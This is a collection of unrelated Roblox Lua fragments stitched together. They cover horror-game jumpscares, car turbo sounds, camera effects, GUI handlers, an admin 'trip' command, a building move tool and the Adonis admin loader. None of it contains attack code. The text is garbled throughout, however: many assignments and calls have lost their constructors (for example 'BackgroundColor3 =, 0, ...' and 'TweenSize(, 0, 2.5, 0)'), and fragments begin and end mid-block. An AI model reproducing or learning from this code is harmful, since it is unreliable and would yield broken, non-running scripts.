v1.Jumpscare_Rush.Visible = false; u2.deathtick = tick(); return; end; if p21 == "A-60" then u2.deathtick = tick() + 10; game.SoundService.Main.Volume = 0; script["Jumpscare_A-60"]:Play(); v1["Jumpscare_A-60"].Visible = true; local v64 = tick(); local v65 = math.random(5, 30) / 10; local v66 = v65 + math.random(10, 60) / 10; local v67 = 0.25; for v68 = 1, 100000 do task.wait(); if v64 + v65 <= tick() then v1["Jumpscare_A-60"].ImageLabel.Visible = true; v65 = v65 + math.random(7, 44) / 10; script["Jumpscare_A-60"].Pitch = 1 + math.random(-100, 100) / 500; v1["Jumpscare_A-60"].BackgroundColor3 =, 0, math.random(0, 10) / 255); v1["Jumpscare_A-60"].ImageLabel.Position =, math.random(-2, 2), 0.5, math.random(-2, 2)); v67 = v67 + 0.05; v1["Jumpscare_A-60"].ImageLabel.Size =, 0, v67, 0); end; if v64 + v66 <= tick() then break; end; end; v1["Jumpscare_A-60"].ImageLabel.Visible = true; script["Jumpscare_A-60"]:Stop(); script["Jumpscare_A-60"]:Play(); v1["Jumpscare_A-60"].ImageLabel.Visible = false; v1["Jumpscare_A-60"].ImageLabelBig.Visible = true; v1["Jumpscare_A-60"].ImageLabelBig:TweenSize(, 0, 2.5, 0), "In", "Sine", 0.3, true); local v69 = tick(); for v70 = 1, 1000 do local v71 = math.random(0, 10) / 10; v1["Jumpscare_A-60"].BackgroundColor3 =, v71, math.clamp(math.random(25, 50) / 50, v71, 1)); v1["Jumpscare_A-60"].ImageLabelBig.Position = + math.random(-100, 100) / 5000, 0, 0.5 + math.random(-100, 100) / 3000, 0); task.wait(0.016666666666666666); if v69 + 0.3 <= tick() then break; end; end; v1["Jumpscare_A-60"].ImageLabelBig.Visible = false; v1["Jumpscare_A-60"].BackgroundColor3 =, 0, 0); v1["Jumpscare_A-60"].Visible = false; u2.deathtick = tick(); return; end; if p21 == "Ambush" then u2.deathtick = tick() + 10; game.SoundService.Main.Volume = 0; script.Jumpscare_Ambush:Play(); v1.Jumpscare_Ambush.Visible = true; local v72 = tick(); local v73 = math.random(5, 30) / 100; local v74 = v73 + math.random(10, 60) / 100; local v75 = 0.2; for v76 = 1, 100000 do task.wait(0.016666666666666666); v1.Jumpscare_Ambush.ImageLabel.Position =, math.random(-15, 15), 0.5, math.random(-15, 15)); v1.Jumpscare_Ambush.BackgroundColor3 =, math.random(4, 10) / 255, math.random(0, 3) / 255); if v72 + v73 <= tick() then v1.Jumpscare_Ambush.ImageLabel.Visible = true; v73 = v73 + math.random(7, 44) / 100; script.Jumpscare_Ambush.Pitch = math.random(35, 155) / 100; v1.Jumpscare_Ambush.BackgroundColor3 =, math.random(4, 10) / 255, math.random(0, 3) / 255); v1.Jumpscare_Ambush.ImageLabel.Position =, math.random(-25, 25), 0.5, math.random(-25, 25)); v75 = v75 + 0.05; v1.Jumpscare_Ambush.ImageLabel.Size =, 0, v75, 0); end; if v72 + v74 <= tick() then break; end; end; script.Jumpscare_Ambush2:Play(); v1.Jumpscare_Ambush.ImageLabel.Visible = true; v1.Jumpscare_Ambush.ImageLabel:TweenSize(, 0, 9, 0), "In", "Quart", 0.3, true); local v77 = tick(); for v78 = 1, 100 do local v79 = math.random(0, 10) / 10; v1.Jumpscare_Ambush.BackgroundColor3 =, math.clamp(math.random(25, 50) / 50, v79, 1), math.clamp(math.random(25, 50) / 150, v79, 1)); game["Run Service"].RenderStepped:wait(); if v77 + 0.3 <= tick() then break; end; end; script.Jumpscare_Ambush:Stop(); v1.Jumpscare_Ambush.ImageLabel.Visible = false; v1.Jumpscare_Ambush.BackgroundColor3 =, 0, 0); v1.Jumpscare_Ambush.Visible = false; u2.deathtick = tick(); return; end; if p21 == "Figure" then l__TweenService__6:Create(game.SoundService.Main,, Enum.EasingStyle.Quart, Enum.EasingDirection.Out), { Volume = 0 }):Play(); local l__FigureSetup__80 = workspace:FindFirstChild("FigureSetup", true); if workspace:FindFirstChild("FigureSetup", true) then local v81 =; if l__FigureSetup__80 then v81 = l__FigureSetup__80.Parent; end; u2.stopcam = true; u2.fovtarget = 80; script.Reverse:Play(); script.Figure_Growl:Play(); local v82 = game:GetService("ReplicatedStorage"):WaitForChild("JumpscareModels"):WaitForChild("Figure"):Clone(); if l__FigureSetup__80 then l__FigureSetup__80.Parent = game:GetService("ReplicatedStorage"); v82:SetPrimaryPartCFrame(l__FigureSetup__80.FigureRagdoll.PrimaryPart.CFrame); else v82:SetPrimaryPartCFrame(; end; v82.Parent =; v82:WaitForChild("AnimationController"):LoadAnimation(v82:WaitForChild("Jumpscare")):Play(0, 1, 1); game.Debris:AddItem(v82, 10); local l__OriginalCFrame__83 = script:WaitForChild("OriginalCFrame"); l__OriginalCFrame__83.Value =; l__TweenService__6:Create(l__OriginalCFrame__83,, Enum.EasingStyle.Exponential, Enum.EasingDirection.Out), { Value = v82:WaitForChild("CamSpot").CFrame }):Play(); u2.camShaker:ShakeOnce(20, 12, 0, 0.2); u2.camShaker:ShakeOnce(2, 24, 0.1, 0.5,, 0, 0),, 1, 3)); u2.camShaker:ShakeOnce(8, 25, 0.7, 1,, 0, 0)); local v84 = tick(); delay(0.55, function() u2.camShaker:ShakeOnce(1, 35, 0.01, 1,, 0, 0),, 1, 3)); end); for v85 = 1, 1000 do game["Run Service"].RenderStepped:wait(); = l__OriginalCFrame__83.Value * u2.csgo; if v84 + 0.8 <= tick() then break; end; end; if l__FigureSetup__80 then l__FigureSetup__80.Parent = v81; end; v82:Destroy(); end; script.Kill:Play(); v1.FlashFrame.Visible = true; for v86 = 1, 8 do v1.FlashFrame.BackgroundColor3 =, 1), 0, 0); wait(); end; v1.FlashFrame.BackgroundColor3 =, 0, 0); = Enum.CameraType.Scriptable; u2.stopcam = false; u2.deathtick = tick(); v1.FlashFrame.Visible = false; end; end); l__Bricks__1:WaitForChild("Cutscene").OnClientEvent:Connect(function(p22) local v87 = script.Cutscenes:FindFirstChild(p22); if v87 then require(v87)(u2); end; end); l__Bricks__1:WaitForChild("GetOutOfHiding").OnClientEvent:Connect(function() u2.char:SetAttribute("Hiding", true); u2.char:SetAttribute("Hiding", false); end); u2.char:GetAttributeChangedSignal("Hiding"):Connect(function() if u2.char:GetAttribute("Hiding") == true then for v88 = 1, 100000 do task.wait(0.1); if u2.char:GetAttribute("Hiding") == false then u2.ax_t = u2.ax_t + u2.camlockedoffset[1] % 360; u2.ay_t = math.clamp(u2.ay_t + u2.camlockedoffset[2], -65, 65); if math.abs(u2.ax_t) > 180 then u2.ax_t = u2.ax_t - 360; u2.ax_t = u2.ax_t; end; if math.abs( > 180 then = - 360; =; end; u2.camShaker:ShakeOnce(8, 1, 0, 1,, 0, 0)); u2.camlock = nil; --game:GetService("ReplicatedStorage").Bricks.CamLock:FireServer(); v1.HideVignette.Visible = false; return; end; end; end; end); l__Bricks__1:WaitForChild("CamLock").OnClientEvent:Connect(function(p23) local v89, v90, v91 =, 0, 0), p23):ToOrientation(); if math.abs( - math.deg(v90)) > 180 then u2.ax_t = u2.ax_t - 360; = u2.ax_t; end; u2.camlock = { y = math.deg(v89), x = math.deg(v90), z = 0, last = tick() + 1, pos = u2.char.PrimaryPart.Position }; u2.camlockHead = false; v1.HideVignette.ImageTransparency = 1; v1.HideVignette.Visible = true; l__TweenService__6:Create(v1.HideVignette,, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), { ImageTransparency = 0 }):Play(); u2.camShaker:ShakeOnce(12, 1, 0, 1,, 0, 0)); end); l__Bricks__1:WaitForChild("CamLockHead").OnClientEvent:Connect(function(p24) local v92, v93, v94 =, 0, 0), p24):ToOrientation(); if math.abs( - math.deg(v93)) > 180 then u2.ax_t = u2.ax_t - 360; end; u2.camlockHead = true; u2.camlock = { y = math.deg(v92), x = math.deg(v93), z = 0, last = tick() + 1, pos = u2.char.PrimaryPart.Position }; end); l__Bricks__1:WaitForChild("CamShake").OnClientEvent:Connect(function(p25, p26, p27, p28, p29, p30) u2.camShaker:ShakeOnce(p25, p26, p27, p28, p29, p30); end); l__Bricks__1:WaitForChild("ChangeModuleVariable").OnClientEvent:Connect(function(p31, p32) u2[p31] = p32; end); local u7 = "HideMonster"; l__Bricks__1:WaitForChild("HideMonster").OnClientEvent:Connect(function(...) require(script:WaitForChild("Modules"):WaitForChild("HideMonster"))(u2, ...); end); u7 = "SpiderJumpscare"; u7 = "SpiderJumpscare"; l__Bricks__1:WaitForChild(u7).OnClientEvent:Connect(function(...) require(script:WaitForChild("Modules"):WaitForChild(u7))(u2, ...); end); l__Bricks__1:WaitForChild("AchievementUnlock").OnClientEvent:Connect(function(...) require(script:WaitForChild("Modules"):WaitForChild("AchievementUnlock"))(u2, ...); end); l__Bricks__1:WaitForChild("Screech").OnClientEvent:Connect(function(...) require(script:WaitForChild("Modules"):WaitForChild("Screech"))(u2, ...); end); function shakerel(p33, p34, p35, p36, p37, p38, p39) local v99 = nil; v99 = 0; for v100 = 1, 2 do local v101 = 100; if v100 == 2 then v101 = 30; end; v99 = v99 + math.abs(math.clamp(( - p33).Magnitude, 0, v101) - v101) / v101; end; u2.camShaker:ShakeOnce(p34 * v99 * 0.8, p35, p36, p37, p38, p39); end; u7 = "CamShakeRelative"; l__Bricks__1:WaitForChild(u7).OnClientEvent:Connect(shakerel); u7 = "LightningStrike"; l__Bricks__1:WaitForChild(u7).OnClientEvent:Connect(v7);
local Loudness = .75 --volume of the boost supplier (not exact volume so you kinda have to experiment with it also) script:WaitForChild("Whistle") script:WaitForChild("Whine") script:WaitForChild("BOV") for i,v in pairs(car.DriveSeat:GetChildren()) do for _,a in pairs(script:GetChildren()) do if v.Name==a.Name then v:Stop() wait() v:Destroy() end end end car.DriveSeat.ChildRemoved:connect(function(child) if child.Name=="SeatWeld" then for i,v in pairs(car.DriveSeat:GetChildren()) do for _,a in pairs(script:GetChildren()) do if v.Name==a.Name then v:Stop() wait() v:Destroy() end end end end end) handler:FireServer("newSound","Whistle",car.DriveSeat,script.Whistle.SoundId,0,script.Whistle.Volume,true) handler:FireServer("newSound","Whine",car.DriveSeat,script.Whine.SoundId,0,script.Whine.Volume,true) handler:FireServer("newSound","BOV",car.DriveSeat,script.BOV.SoundId,0,script.BOV.Volume,true) handler:FireServer("playSound","Whistle") handler:FireServer("playSound","Whine") car.DriveSeat:WaitForChild("Whistle") car.DriveSeat:WaitForChild("Whine") car.DriveSeat:WaitForChild("BOV") local ticc = tick() local _TCount = 0 if _Tune.Aspiration == "Single" or _Tune.Aspiration == "Super" then _TCount = 1 elseif _Tune.Aspiration == "Double" then _TCount = 2 end while wait() do local psi = (((script.Parent.Values.Boost.Value)/(_Tune.Boost*_TCount))*2) local WP,WV,BP,BV,HP,HV = 0 BOVact = math.floor(psi*20) if _Tune.Aspiration == "Single" or _Tune.Aspiration == "Double" then WP = (psi) WV = (psi/4)*Loudness BP = (1-(-psi/20))*BOV_Pitch BV = (((-0.5+((psi/2)*BOV_Loudness)))*(1 - script.Parent.Values.Throttle.Value)) if BOVact < BOVact2 then if car.DriveSeat.BOV.IsPaused then if FE then handler:FireServer("playSound","BOV") else car.DriveSeat.BOV:Play() end end end if BOVact >= BOVact2 then if FE then handler:FireServer("stopSound","BOV") else car.DriveSeat.BOV:Stop() end end elseif _Tune.Aspiration == "Super" then psi = psi/2 HP = psi*Whine_Pitch HV = (psi/4)*Loudness end if FE then handler:FireServer("updateSound","Whistle",script.Whistle.SoundId,WP,WV) handler:FireServer("updateSound","Whine",script.Whine.SoundId,HP,HV) handler:FireServer("updateSound","BOV",script.BOV.SoundId,BP,BV) else car.DriveSeat.Whistle.Pitch = WP car.DriveSeat.Whistle.Volume = WV car.DriveSeat.Whine.Pitch = HP car.DriveSeat.Whine.Volume = HV car.DriveSeat.BOV.Pitch = BP car.DriveSeat.BOV.Volume = BV end if (tick()-ticc) >= 0.1 then BOVact2 = math.floor(psi*20) ticc = tick() end end
-- Fill this with any specific player you want to be able to seek
local playerIDs = {}
--tone hz
elseif sv.Value==4 then while s.Pitch<0.9 do s.Pitch=s.Pitch+0.010 s:Play() if s.Pitch>0.9 then s.Pitch=0.9 end wait(-9) end while true do for x = 1, 500 do s:play() wait(-9) end wait() end
-- script
RunService.RenderStepped:Connect(function() local currentTime = tick() if humanoid.MoveDirection.Magnitude > 0 then -- we are walking local bobbleX = math.cos(currentTime * 7) * .10 local bobbleY = math.abs(math.sin(currentTime * 7)) * .20 local bobble =, bobbleY, 0) humanoid.CameraOffset = humanoid.CameraOffset:lerp(bobble, .25) else -- we are not walking local t = tick() local x = math.cos(t * speed) * intensity local y = math.sin(t * speed) * intensity local cf =, y, 0),*0.95, y*0.95, -10)) + camera.CFrame.Position camera.CFrame = camera.CFrame:Lerp(cf * camera.CFrame.Rotation, smoothness) end end)
-- Children:
function Replica:ListenToChildAdded(listener) --> [ScriptConnection] listener(replica) if type(listener) ~= "function" then error("[ReplicaController]: Only a function can be set as listener") end if Replicas[self.Id] == nil then return -- Replica is destroyed - listener will not be connected end -- Getting listener table for replica class: local listeners = ChildListeners[self.Id] if listeners == nil then listeners = {} ChildListeners[self.Id] = listeners end table.insert(listeners, listener) -- ScriptConnection which allows the disconnection of the listener: return Madwork.NewArrayScriptConnection(listeners, listener) end function Replica:FindFirstChildOfClass(replica_class) --> [Replica] or nil for _, child in ipairs(self.Children) do if child.Class == replica_class then return child end end return nil end
--[=[ Extracts the locale from the folder, or a locale and table. @param tableName string -- Used for source @param first Instance | string @param second table? @return LocalizationTable ]=]
function JsonToLocalizationTable.toLocalizationTable(tableName, first, second) assert(type(tableName) == "string", "Bad tableName") if typeof(first) == "Instance" then local result = JsonToLocalizationTable.loadFolder(tableName, first) -- result.Name = ("JSONTable_%s"):format(first.Name) return result elseif type(first) == "string" and type(second) == "table" then local result = JsonToLocalizationTable.loadTable(tableName, first, second) return result else error("Bad args") end end
--Right lean Divider
ZR15RightLegRightLeanD = 1 XR15RightLegRightLeanD = 1 YR15RightLegRightLeanD = 1 R15RightKneeRightLeanD = 1 ZR15RightArmRightLeanD = 1 XR15RightArmRightLeanD = 1 YR15RightArmRightLeanD = 1 R15RightElbowRightLeanD = 1 ZR15LeftLegRightLeanD = 1 XR15LeftLegRightLeanD = 1 YR15LeftLegRightLeanD = 1 R15LeftKneeRightLeanD = 1 ZR15LeftArmRightLeanD = 1 XR15LeftArmRightLeanD = 1 YR15LeftArmRightLeanD = 1 R15LeftElbowRightLeanD = 1 ZR15LowerTorsoRightLeanD = 1 XR15LowerTorsoRightLeanD = 1 YR15LowerTorsoRightLeanD = 1 ZR15UpperTorsoRightLeanD = 1
if string.sub(msg,1,5) == "trip/" then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then torso.CFrame =,torso.Position.y,torso.Position.z,0, 0, 1, 0, -1, 0, 1, 0, 0)--math.random(),math.random(),math.random(),math.random(),math.random(),math.random(),math.random(),math.random(),math.random()) -- i like the people being upside down better. end end end end end
--[=[ @param name string @param fn (player: Player, ...: any) -> ...: any @param inboundMiddleware ServerMiddleware? @param outboundMiddleware ServerMiddleware? @return RemoteFunction Creates a RemoteFunction and binds the given function to it. Inbound and outbound middleware can be applied if desired. ```lua local function GetSomething(player: Player) return "Something" end serverComm:BindFunction("GetSomething", GetSomething) ``` ]=]
function ServerComm:BindFunction(name: string, fn: Types.FnBind, inboundMiddleware: Types.ServerMiddleware?, outboundMiddleware: Types.ServerMiddleware?): RemoteFunction return Comm.BindFunction(self._instancesFolder, name, fn, inboundMiddleware, outboundMiddleware) end
--> References
local Gui = script.Parent local Frame = Gui.Frame
----------------------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------
script.Parent.Treat.Frame.Bandage.MouseButton1Down:connect(function() script.Parent.Treat.Frame.BandFrame.Visible = true script.Parent.Treat.Frame.MedFrame.Visible = false script.Parent.Treat.Frame.NeedFrame.Visible = false script.Parent.Treat.Frame.OtherFrame.Visible = false end) script.Parent.Treat.Frame.Medicine.MouseButton1Down:connect(function() script.Parent.Treat.Frame.BandFrame.Visible = false script.Parent.Treat.Frame.MedFrame.Visible = true script.Parent.Treat.Frame.NeedFrame.Visible = false script.Parent.Treat.Frame.OtherFrame.Visible = false end) script.Parent.Treat.Frame.Needle.MouseButton1Down:connect(function() script.Parent.Treat.Frame.BandFrame.Visible = false script.Parent.Treat.Frame.MedFrame.Visible = false script.Parent.Treat.Frame.NeedFrame.Visible = true script.Parent.Treat.Frame.OtherFrame.Visible = false end) script.Parent.Treat.Frame.Other.MouseButton1Down:connect(function() script.Parent.Treat.Frame.BandFrame.Visible = false script.Parent.Treat.Frame.MedFrame.Visible = false script.Parent.Treat.Frame.NeedFrame.Visible = false script.Parent.Treat.Frame.OtherFrame.Visible = true end)
--Don't worry about the rest of the code, except for line 25.
game.Players.PlayerAdded:connect(function(player) local leader ="Folder",player) leader.Name = "Skins" local Cash ="StringValue",leader) Cash.Name = stat Cash.Value = ds:GetAsync(player.UserId) or startamount ds:SetAsync(player.UserId, Cash.Value) Cash.Changed:connect(function() ds:SetAsync(player.UserId, Cash.Value) end) end) game.Players.PlayerRemoving:connect(function(player) wait(.1) ds:SetAsync(player.UserId, player.Skins.Equipped.Value) --Change "Points" to the name of your leaderstat. end)
--------RIGHT DOOR --------
game.Workspace.doorright.l11.BrickColor = game.Workspace.doorright.l22.BrickColor = game.Workspace.doorright.l33.BrickColor = game.Workspace.doorright.l41.BrickColor = game.Workspace.doorright.l52.BrickColor = game.Workspace.doorright.l63.BrickColor = game.Workspace.doorright.l71.BrickColor = game.Workspace.doorright.l43.BrickColor = game.Workspace.doorright.l61.BrickColor = game.Workspace.doorright.l53.BrickColor = game.Workspace.doorright.l72.BrickColor = game.Workspace.doorright.l62.BrickColor = game.Workspace.doorright.l51.BrickColor = game.Workspace.doorright.l21.BrickColor = game.Workspace.doorright.l31.BrickColor = game.Workspace.doorright.l12.BrickColor = game.Workspace.doorright.l13.BrickColor = game.Workspace.doorright.l32.BrickColor = game.Workspace.doorright.l23.BrickColor = game.Workspace.doorright.l42.BrickColor = game.Workspace.doorright.l73.BrickColor = game.Workspace.doorright.pillar.BrickColor = game.Workspace.Lighting.flashcurrent.Value = "12"
------------------------------------------------------------------------------------------------------------------------------------------------------ -- Events ------------------------------------------------------------------------------------------------------------------------------------------------------
UserInputService.InputBegan:connect(function(Input) if Input.KeyCode == Enum.KeyCode.S then CurrentPath = nil MouseHolding = false if PathingThread then coroutine.yield(PathingThread) end LocalCharacter:WaitForChild('Humanoid'):MoveTo(LocalCharacter.HumanoidRootPart.Position) end end) LocalMouse.Button2Down:connect(function() MouseHolding = true repeat --wait(0.05) if PathingThread then coroutine.yield(PathingThread) end PathingThread = coroutine.resume(coroutine.create(function() CreatePath() end)) print(1) wait(0.05) until MouseHolding == false or CurrentPath == nil end) LocalMouse.Button2Up:connect(function() MouseHolding = false end)
--I advise to keep true if this tool has a "FlyScript" created after 20/7/2011 ( see child of this script)
local Vert_keep = true-- set to false if U DONT want the tool to Go only Up if u press/hold the U/J key
--// Ammo Settings
Ammo = 0; StoredAmmo = 0; MagCount = 0; -- If you want infinate ammo, set to math.huge EX. MagCount = math.huge; ExplosiveAmmo = math.huge;
-- Initialize the tool
local MoveTool = { Name = 'Move Tool'; Color = 'Deep orange'; -- Default options Increment = 1; Axes = 'Global'; -- Selection state InitialState = nil; InitialFocusCFrame = nil; InitialExtentsSize = nil; InitialExtentsCFrame = nil; -- Snapping state SnappedPoint = nil; PointSnapped =; -- Resource maid Maid =; -- Signals DragChanged =; AxesChanged =; } MoveTool.ManualText = [[<font face="GothamBlack" size="16">Move Tool 🛠</font> Allows you to move parts.<font size="12"><br /></font> <font size="12" color="rgb(150, 150, 150)"><b>Axes</b></font> This option lets you choose in which direction to move each part.<font size="6"><br /></font> <font color="rgb(150, 150, 150)">•</font> <b>GLOBAL</b> <font color="rgb(150, 150, 150)">—</font> Relative to the <b>world</b> <font color="rgb(150, 150, 150)">•</font> <b>LOCAL</b> <font color="rgb(150, 150, 150)">—</font> Relative to each <b>individual part</b> <font color="rgb(150, 150, 150)">•</font> <b>LAST</b> <font color="rgb(150, 150, 150)">—</font> Relative to the <b>last part clicked</b><font size="6"><br /></font> <b>TIP:</b> Click on any part to focus the handles on it.<font size="6"><br /></font> <b>TIP: </b>Hit the <b>Enter</b> key to switch between Axes modes quickly.<font size="12"><br /></font> <font size="12" color="rgb(150, 150, 150)"><b>Increment</b></font> Lets you choose how many studs to move parts by.<font size="6"><br /></font> <b>TIP: </b>Hit the – key to quickly type increments.<font size="6"><br /></font> <b>TIP: </b>Use your number pad to move exactly by the current increment. Holding <b>Shift</b> reverses the increment.<font size="4"><br /></font> <font color="rgb(150, 150, 150)">•</font> 8 & 2 — up & down <font color="rgb(150, 150, 150)">•</font> 1 & 9 — back & forth <font color="rgb(150, 150, 150)">•</font> 4 & 6 — left & right<font size="12"><br /></font> <font size="12" color="rgb(150, 150, 150)"><b>Snapping</b></font> You can place parts perfectly together by holding the <b><i>R</i></b> key, and dragging parts by their <b>snap points</b>.<font size="12"><br /></font> <font size="12" color="rgb(150, 150, 150)"><b>Alignment</b></font> Press <b><i>T</i></b> while dragging to <b>align</b> the bottom surface of your base part to the current target surface. ]]
--Runtime Loop -- ~60 c/s
game["Run Service"].Stepped:connect(function() --Steering Steering() --Power Engine() --Update External Values _IsOn = script.Parent.IsOn.Value _InControls = script.Parent.ControlsOpen.Value script.Parent.Values.Gear.Value = _CGear script.Parent.Values.RPM.Value = _RPM script.Parent.Values.Boost.Value = (_Boost/2)*_TPsi script.Parent.Values.Horsepower.Value = _HP script.Parent.Values.HpNatural.Value = _NH script.Parent.Values.HpBoosted.Value = _BH*(_Boost/2) script.Parent.Values.Torque.Value = _HP * _Tune.EqPoint / _RPM script.Parent.Values.TqNatural.Value = _NT script.Parent.Values.TqBoosted.Value = _BT*(_Boost/2) script.Parent.Values.TransmissionMode.Value = _TMode script.Parent.Values.Throttle.Value = _GThrot*_GThrotShift script.Parent.Values.Brake.Value = _GBrake script.Parent.Values.SteerC.Value = _GSteerC*(1-math.min(car.DriveSeat.Velocity.Magnitude/_Tune.SteerDecay,1-(_Tune.MinSteer/100))) script.Parent.Values.SteerT.Value = _GSteerT script.Parent.Values.PBrake.Value = _PBrake script.Parent.Values.TCS.Value = _TCS script.Parent.Values.TCSActive.Value = _TCSActive script.Parent.Values.TCSAmt.Value = 1-_TCSAmt script.Parent.Values.ABS.Value = _ABS script.Parent.Values.ABSActive.Value = _ABSActive script.Parent.Values.MouseSteerOn.Value = _MSteer script.Parent.Values.Velocity.Value = car.DriveSeat.Velocity end)
--// Init
return service.NewProxy({ __call = function(tab, data) local mutex = service.RunService:FindFirstChild("__Adonis_MODULE_MUTEX") if mutex then warn("\n-----------------------------------------------" .."\nAdonis server-side is already running! Aborting..." .."\n-----------------------------------------------") script:Destroy() return "FAILED" else mutex = service.New("StringValue", {Name = "__Adonis_MODULE_MUTEX", Value = "Running"}) local mutexBackup = mutex:Clone() local function makePersistent(m) local connection1, connection2 = nil, nil connection1 = m:GetPropertyChangedSignal("Parent"):Connect(function() if not m or m.Parent ~= service.RunService then connection1:Disconnect() connection2:Disconnect() warn("Adonis module mutex removed; Regenerating...") makePersistent(mutexBackup) mutexBackup.Parent = service.RunService mutexBackup = mutexBackup:Clone() end end) connection2 = m:GetPropertyChangedSignal("Name"):Connect(function() if m and m.Name ~= "__Adonis_MODULE_MUTEX" then warn("Adonis module mutex renamed; Refreshing...") m.Name = "__Adonis_MODULE_MUTEX" end end) end makePersistent(mutex) mutex.Parent = service.RunService end --// Begin Script Loading setfenv(1, setmetatable({}, {__metatable = unique})) data = service.Wrap(data or {}) if not data or not data.Loader then warn("WARNING: MainModule loaded without using the loader;") end --// Server Variables local setTab = require(server.Deps.DefaultSettings) server.Defaults = setTab server.Settings = data.Settings or setTab.Settings or {} -- For some reason line 540 errors because CloneTable is nil local function CloneTable(tab, recursive) local clone = table.clone(tab) if recursive then for i,v in pairs(clone) do if type(v) == "table" then clone[i] = CloneTable(v, recursive) end end end return clone end server.OriginalSettings = CloneTable(server.Settings, true) server.Descriptions = data.Descriptions or setTab.Descriptions or {} server.Messages = data.Messages or setTab.Settings.Messages or {} server.Order = data.Order or setTab.Order or {} server.Data = data or {} server.Model = data.Model or service.New("Model") server.ModelParent = data.ModelParent or service.ServerScriptService; server.Dropper = data.Dropper or service.New("Script") server.Loader = data.Loader or service.New("Script") server.Runner = data.Runner or service.New("Script") server.LoadModule = LoadModule server.LoadPackage = LoadPackage server.ServiceSpecific = ServiceSpecific server.Shared = Folder.Shared server.ServerPlugins = data.ServerPlugins server.ClientPlugins = data.ClientPlugins server.Client = Folder.Parent.Client locals.Settings = server.Settings locals.CodeName = server.CodeName --// THIS NEEDS TO BE DONE **BEFORE** ANY EVENTS ARE CONNECTED if server.Settings.HideScript and data.Model then data.Model.Parent = nil script:Destroy() end --// Copy client themes, plugins, and shared modules to the client folder local packagesToRunWithPlugins = {}; local shared = service.New("Folder", { Name = "Shared"; Parent = server.Client; }) for index, module in ipairs(Folder.Shared:GetChildren()) do module:Clone().Parent = shared; end for index,plugin in pairs(data.ClientPlugins or {}) do plugin:Clone().Parent = server.Client.Plugins; end for index,theme in pairs(data.Themes or {}) do theme:Clone().Parent = server.Client.UI; end for index,pkg in pairs(data.Packages or {}) do LoadPackage(pkg, Folder.Parent, false); end for setting,value in pairs(server.Defaults.Settings) do if server.Settings[setting] == nil then server.Settings[setting] = value end end for desc,value in pairs(server.Defaults.Descriptions) do if server.Descriptions[desc] == nil then server.Descriptions[desc] = value end end --// Bind cleanup service.DataModel:BindToClose(CleanUp) --server.CleanUp = CleanUp; --// Require some dependencies server.Threading = require(server.Deps.ThreadHandler) server.Changelog = require(server.Shared.Changelog) server.Credits = require(server.Shared.Credits) do local MaterialIcons = require(server.Shared.MatIcons) server.MatIcons = setmetatable({}, { __index = function(self, ind) local materialIcon = MaterialIcons[ind] if materialIcon then self[ind] = string.format("rbxassetid://%d", materialIcon) return self[ind] end end, __metatable = "Adonis" }) end --// Load services for ind, serv in ipairs(ServicesWeUse) do local temp = service[serv] end --// Load core modules for ind,load in ipairs(LoadingOrder) do local CoreModule = Folder.Core:FindFirstChild(load) if CoreModule then LoadModule(CoreModule, true, nil, nil, true) --noenv, CoreModule end end --// Server Specific Service Functions ServiceSpecific.GetPlayers = server.Functions.GetPlayers --// Initialize Cores local runLast = {} local runAfterInit = {} local runAfterPlugins = {} for i,name in ipairs(LoadingOrder) do local core = server[name] if core then if type(core) == "table" or (type(core) == "userdata" and getmetatable(core) == "ReadOnly_Table") then if core.RunLast then table.insert(runLast, core.RunLast); core.RunLast = nil; end if core.RunAfterInit then table.insert(runAfterInit, core.RunAfterInit); core.RunAfterInit = nil; end if core.RunAfterPlugins then table.insert(runAfterPlugins, core.RunAfterPlugins); core.RunAfterPlugins = nil; end if core.Init then core.Init(data); core.Init = nil; end end end end --// Variables that rely on core modules being initialized server.Logs.Errors = ErrorLogs --// Load any afterinit functions from modules (init steps that require other modules to have finished loading) for i,f in pairs(runAfterInit) do f(data); end --// Load Plugins for index,plugin in ipairs(server.PluginsFolder:GetChildren()) do LoadModule(plugin, false, {script = plugin}, true); --noenv end for index,plugin in pairs(data.ServerPlugins or {}) do LoadModule(plugin, false, {script = plugin}); end --// We need to do some stuff *after* plugins are loaded (in case we need to be able to account for stuff they may have changed before doing something, such as determining the max length of remote commands) for i,f in pairs(runAfterPlugins) do f(data); end --// Below can be used to determine when all modules and plugins have finished loading; service.Events.AllModulesLoaded:Connect(function() doSomething end) server.AllModulesLoaded = true; service.Events.AllModulesLoaded:Fire(os.time()); --// Queue handler --service.StartLoop("QueueHandler","Heartbeat",service.ProcessQueue) --// Stuff to run after absolutely everything else has had a chance to run and initialize and all that for i,f in pairs(runLast) do f(data); end if data.Loader then warn("Loading Complete; Required by "..tostring(data.Loader:GetFullName())) else warn("Loading Complete; No loader location provided") end if server.Logs then server.Logs.AddLog(server.Logs.Script, { Text = "Finished Loading"; Desc = "Adonis finished loading"; }) else warn("SERVER.LOGS TABLE IS MISSING. THIS SHOULDN'T HAPPEN! SOMETHING WENT WRONG WHILE LOADING CORE MODULES(?)"); end service.Events.ServerInitialized:Fire(); return "SUCCESS" end; __tostring = function() return "Adonis" end; __metatable = "Adonis"; })
function onClicked() R.Function1.Disabled = false R.loop.Disabled = true R.BrickColor ="CGA brown") R.Function2.Disabled = true end script.Parent.ClickDetector.MouseClick:connect(onClicked)
--[[** ensures Roblox ColorSequenceKeypoint type @param value The value to check against @returns True iff the condition is satisfied, false otherwise **--]]
t.ColorSequenceKeypoint = primitive("ColorSequenceKeypoint")
-- declarations
local Figure = script.Parent local Head = Figure:WaitForChild("Head") local Humanoid; for _,Child in pairs(Figure:GetChildren())do if Child and Child.ClassName=="Humanoid"then Humanoid=Child; end; end; local regening = false
--Light off
src.left.Value.Value = 0 light.Value = false else src.left.Value.Value = 1 light.Value = true return end end end) src.Parent.ChildRemoved:connect(function(child) if child.Name=="SeatWeld" then src:Stop() script.Parent:Destroy() end end)
-- Libraries
Security = require(Tool.Core.Security); RegionModule = require(Tool.Libraries.Region); Support = require(Tool.Libraries.SupportLibrary); Serialization = require(Tool.Libraries.SerializationV3);
--local HighLight = char:WaitForChild("PLayerHighLight")
function deathCheck(health) if health <= 0 and dead == false then dead = true char.HumanoidRootPart.Anchored = true deathAnim:Play() wait(2.5) hum.BreakJointsOnDeath = true wait(0.5) char.HumanoidRootPart.Anchored = false script:Destroy() end end hum.HealthChanged:Connect(deathCheck)
